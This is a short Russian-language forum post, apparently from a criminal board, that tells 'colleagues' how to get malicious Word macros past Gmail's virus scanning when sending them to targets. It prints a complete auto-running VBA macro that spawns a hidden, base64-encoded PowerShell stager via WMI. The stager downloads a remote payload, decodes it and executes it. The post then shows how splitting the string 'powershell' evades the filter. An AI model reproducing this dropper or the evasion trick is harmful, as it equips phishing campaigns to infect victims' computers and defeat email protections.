Привет колеги. Вы уж извините , но это статья будет короткая но со смыслом)))
Как большинство из вас знает,почта gmail всячески не дает нам отсылать вредоносные макросы нашим так сказать клиентам)
И вот некоторыми хорошими людьми было замечено что службы gmail парсят в макросах документа определенные слова,в случае обнаружение таких будет уведомления о том что в документе обнаружен вирус , и в лучшем случае письмо просто попадет в спам,а обычно даже отослать не дают.
Обходится это очень и очень просто)
Если у нас код макроса следующего вида:
То для обхождения фильтра нам нужно просто :
Разбить запрос что бы фильтры не смогли скушать целое слово powershell
И изменить первых две строки
На
B все) Профит)
Cпасибо за внимание)
Как большинство из вас знает,почта gmail всячески не дает нам отсылать вредоносные макросы нашим так сказать клиентам)
И вот некоторыми хорошими людьми было замечено что службы gmail парсят в макросах документа определенные слова,в случае обнаружение таких будет уведомления о том что в документе обнаружен вирус , и в лучшем случае письмо просто попадет в спам,а обычно даже отослать не дают.
Обходится это очень и очень просто)
Если у нас код макроса следующего вида:
Код:
Sub AutoOpen()
Debugging
End Sub
Sub Document_Open()
Debugging
End Sub
Public Function Debugging() As Variant
Dim Str As String
str = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT"
str = str + "AHkAcwB0AGUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG"
str = str + "8ASQBOAHQATQBhAE4AQQBnAEUAUgBdADoAOgBFAFgAcABFAEMA"
str = str + "VAAxADAAMABDAG8ATgB0AGkAbgBVAEUAIAA9ACAAMAA7ACQAVw"
str = str + "BjAD0ATgBlAFcALQBPAEIAagBlAEMAVAAgAFMAeQBzAFQARQBt"
str = str + "AC4ATgBlAFQALgBXAGUAYgBDAEwASQBFAE4AVAA7ACQAdQA9AC"
str = str + "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A"
str = str + "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA"
str = str + "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw"
str = str + "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAE"
str = str + "gAZQBhAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA"
str = str + "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAWQ"
str = str + "AgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBFAFQALgBXAEUAYgBS"
str = str + "AEUAcQB1AGUAcwBUAF0AOgA6AEQAZQBGAGEAVQBsAHQAVwBFAG"
str = str + "IAUABSAG8AeAB5ADsAJABXAGMALgBQAFIAbwBYAHkALgBDAFIA"
str = str + "ZQBkAGUATgB0AEkAQQBMAHMAIAA9ACAAWwBTAHkAUwBUAEUAbQ"
str = str + "AuAE4ARQBUAC4AQwBSAGUAZABlAE4AdABJAGEAbABDAEEAQwBI"
str = str + "AEUAXQA6ADoARABFAEYAYQBVAEwAdABOAGUAdAB3AE8AUgBLAE"
str = str + "MAUgBlAGQAZQBuAHQASQBBAEwAUwA7ACQASwA9ACcAeQAzAGAA"
str = str + "QQAuAGQAZgBsAFMAYgBNAFcAKwB6AEcAdwBWADkAQgBeADAAPQ"
str = str + "BcADQAYwAkAHIAWwBnACUAUQBOACcAOwAkAGkAPQAwADsAWwBj"
str = str + "AGgAYQByAFsAXQBdACQAQgA9ACgAWwBjAEgAQQBSAFsAXQBdAC"
str = str + "gAJAB3AGMALgBEAG8AVwBOAEwATwBBAGQAUwBUAHIASQBuAGcA"
str = str + "KAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMw"
str = str + "A3AC4AMQAzADcAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBz"
str = str + "AHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgAbwByACQASwBbAC"
str = str + "QAaQArACsAJQAkAGsALgBMAGUAbgBnAHQASABdAH0AOwBJAEUA"
str = str + "WAAgACgAJABiAC0ASgBPAEkAbgAnACcAKQA="
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create str, Null, objConfig, intProcessID
End FunctionТо для обхождения фильтра нам нужно просто :
Разбить запрос что бы фильтры не смогли скушать целое слово powershell
И изменить первых две строки
Код:
str = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT"
str = str + "AHkAcwB0AGUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG"
Код:
str = "powersh"
str = str + "ell.exe -NoP -sta -NonI -W Hidden -Enc WwBT"
str = str + "AHkAcwB0AGUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG"Cпасибо за внимание)
